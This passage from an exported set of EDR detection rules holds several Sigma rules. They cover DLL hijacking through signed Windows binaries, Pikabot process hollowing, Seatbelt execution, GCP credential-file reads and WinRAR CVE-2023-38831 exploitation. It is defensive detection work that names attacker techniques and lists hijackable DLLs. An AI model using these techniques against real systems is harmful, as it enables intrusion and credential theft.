'\\SspiCli.dll'\n - '\\WINHTTP.dll'\n - '\\wkscli.dll'\n - '\\WLDP.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e0c666b-c55c-45ac-b889-dd35b1dd206c",
"rule_name": "DLL Hijacking via mshta.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mshta.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nLoads where the executable or the loaded library resides under System32, SysWOW64 or WinSxS, or where the loaded library is signed by Microsoft Windows, are excluded.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e473606-203c-47b8-8899-647af707c98a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080012Z",
"creation_date": "2026-03-23T11:45:34.080014Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080018Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot",
"https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot",
"https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_searchprotocolhost_execution.yml",
"content": "title: Suspicious SearchProtocolHost.exe Execution\nid: 2e473606-203c-47b8-8899-647af707c98a\ndescription: |\n Detects the suspicious execution of the legitimate SearchProtocolHost.exe Windows binary without legitimate command-line arguments.\n This technique has been used by the Pikabot malware, which starts SearchProtocolHost as a host for its payload, injected via process hollowing.\n Attackers can use process hollowing to inject malicious code into legitimate processes, allowing them to evade detection and execute harmful activities on a compromised system.\n It is recommended to analyze actions taken by SearchProtocolHost as well as to look for other suspicious actions performed by the parent process.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot\n - https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot\n - https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/11/20\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'SearchProtocolHost.exe'\n ProcessParentImage|contains: '?'\n\n filter_commandline:\n CommandLine|contains: ' Global\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e473606-203c-47b8-8899-647af707c98a",
"rule_name": "Suspicious SearchProtocolHost.exe Execution",
"rule_description": "Detects the suspicious execution of the legitimate SearchProtocolHost.exe Windows binary without legitimate command-line arguments.\nThis technique has been used by the Pikabot malware, which starts SearchProtocolHost as a host for its payload, injected via process hollowing.\nAttackers can use process hollowing to inject malicious code into legitimate processes, allowing them to evade detection and execute harmful activities on a compromised system.\nIt is recommended to analyze actions taken by SearchProtocolHost as well as to look for other suspicious actions performed by the parent process.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-09-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e58af7c-54b9-470d-b64b-f3731c941837",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594471Z",
"creation_date": "2026-03-23T11:45:34.594474Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594482Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systemreset.yml",
"content": "title: DLL Hijacking via systemreset.exe\nid: 2e58af7c-54b9-470d-b64b-f3731c941837\ndescription: |\n Detects potential Windows DLL Hijacking via systemreset.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systemreset.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\d3d10warp.dll'\n - '\\d3d11.dll'\n - '\\dbgcore.DLL'\n - '\\DismApi.DLL'\n - '\\dxgi.dll'\n - '\\FVEAPI.dll'\n - '\\ReAgent.dll'\n - '\\ResetEngine.dll'\n - '\\tbs.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n - '\\WIMGAPI.DLL'\n - '\\WINHTTP.dll'\n - '\\WOFUTIL.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e58af7c-54b9-470d-b64b-f3731c941837",
"rule_name": "DLL Hijacking via systemreset.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systemreset.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588697Z",
"creation_date": "2026-03-23T11:45:34.588700Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588708Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wwahost.yml",
"content": "title: DLL Hijacking via WWAHost.exe\nid: 2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480\ndescription: |\n Detects potential Windows DLL Hijacking via WWAHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WWAHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\profapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480",
"rule_name": "DLL Hijacking via WWAHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WWAHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e734ab0-736c-4df7-904a-68429e75bea2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606287Z",
"creation_date": "2026-03-23T11:45:34.606291Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606298Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/GhostPack/Seatbelt",
"https://attack.mitre.org/techniques/T1082/"
],
"name": "t1082_launch_seatbelt.yml",
"content": "title: Seatbelt HackTool Executed\nid: 2e734ab0-736c-4df7-904a-68429e75bea2\ndescription: |\n Detects the execution of the Seatbelt host enumeration and security assessment tool.\n Seatbelt is an offensive security tool commonly used by attackers during the discovery phase to gather detailed system information, security configurations, and potential weaknesses that could be exploited for privilege escalation.\n Unless this execution is part of an authorized security audit, it is recommended to investigate the context of this activity including the user account involved and any data gathered by the tool, as it may indicate reconnaissance for an attack.\nreferences:\n - https://github.com/GhostPack/Seatbelt\n - https://attack.mitre.org/techniques/T1082/\ndate: 2021/04/26\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Seatbelt\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\Seatbelt.exe'\n - OriginalFileName: 'Seatbelt.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e734ab0-736c-4df7-904a-68429e75bea2",
"rule_name": "Seatbelt HackTool Executed",
"rule_description": "Detects the execution of the Seatbelt host enumeration and security assessment tool.\nSeatbelt is an offensive security tool commonly used by attackers during the discovery phase to gather detailed system information, security configurations, and potential weaknesses that could be exploited for privilege escalation.\nUnless this execution is part of an authorized security audit, it is recommended to investigate the context of this activity including the user account involved and any data gathered by the tool, as it may indicate reconnaissance for an attack.\n",
"rule_creation_date": "2021-04-26",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e7c5a05-6c01-4aac-b25c-16ea27b31087",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098251Z",
"creation_date": "2026-03-23T11:45:34.098253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098258Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_004_gcp_config_read_macos.yml",
"content": "title: Suspicious Access to GCP Database File\nid: 2e7c5a05-6c01-4aac-b25c-16ea27b31087\ndescription: |\n Detects an attempt to read the content of the GCP database.\n Adversaries may access a user's GCP database file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branch\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path: '/Users/*/.config/gcloud/credentials.db'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup software ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_haxm:\n Image: '/usr/local/haxm/*/haxm'\n ProcessSignatureSigningId: 'Agent_final'\n ProcessSigned: 'true'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e7c5a05-6c01-4aac-b25c-16ea27b31087",
"rule_name": "Suspicious Access to GCP Database File",
"rule_description": "Detects an attempt to read the content of the GCP database.\nAdversaries may access a user's GCP database file in order to gather credentials and move to cloud environments.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e91d378-094f-4d0e-8695-ea6539ed28c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084718Z",
"creation_date": "2026-03-23T11:45:34.084720Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084724Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/",
"https://nvd.nist.gov/vuln/detail/CVE-2023-38831",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1203_winrar_vulnerability.yml",
"content": "title: WinRAR CVE-2023-38831 Vulnerability Exploited\nid: 2e91d378-094f-4d0e-8695-ea6539ed28c9\ndescription: |\n Detects command-lines related to the exploitation of CVE-2023-38831, a vulnerability affecting WinRAR.\n WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive.\n This vulnerability was exploited in the wild from April through August 2023.\n It is recommended to investigate any child processes and alerts on the affected machine.\nreferences:\n - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-38831\n - https://attack.mitre.org/techniques/T1203/\ndate: 2023/08/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - cve.2023-38831\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-38831\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n ParentImage|endswith: '\\Winrar.exe'\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\Rar$*\\'\n\n selection_extension:\n CommandLine|endswith:\n - ' .exe'\n - ' .cmd'\n - ' .bat'\n - ' .vbs'\n - ' .wsf'\n - ' .wsh'\n - ' .ps1'\n - ' .js'\n - ' .exe '\n - ' .cmd '\n - ' .bat '\n - ' .vbs '\n - ' .wsf '\n - ' .wsh '\n - ' .ps1 '\n - ' .js '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e91d378-094f-4d0e-8695-ea6539ed28c9",
"rule_name": "WinRAR CVE-2023-38831 Vulnerability Exploited",
"rule_description": "Detects command-lines related to the exploitation of CVE-2023-38831, a vulnerability affecting WinRAR.\nWinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive.\nThis vulnerability was exploited in the wild from April through August 2023.\nIt is recommended to investigate any child processes and alerts on the affected machine.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1203"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2eedf312-fb18-46f6-8ce9-aed5bedd3dd7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593612Z",
"creation_date": "2026-03-23T11:45:34.593616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593623Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systeminfo.yml",
"content": "title: DLL Hijacking via systeminfo.exe\nid: 2eedf312-fb18-46f6-8ce9-aed5bedd3dd7\ndescription: |\n Detects potential Windows DLL Hijacking via systeminfo.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systeminfo.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\mpr.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - 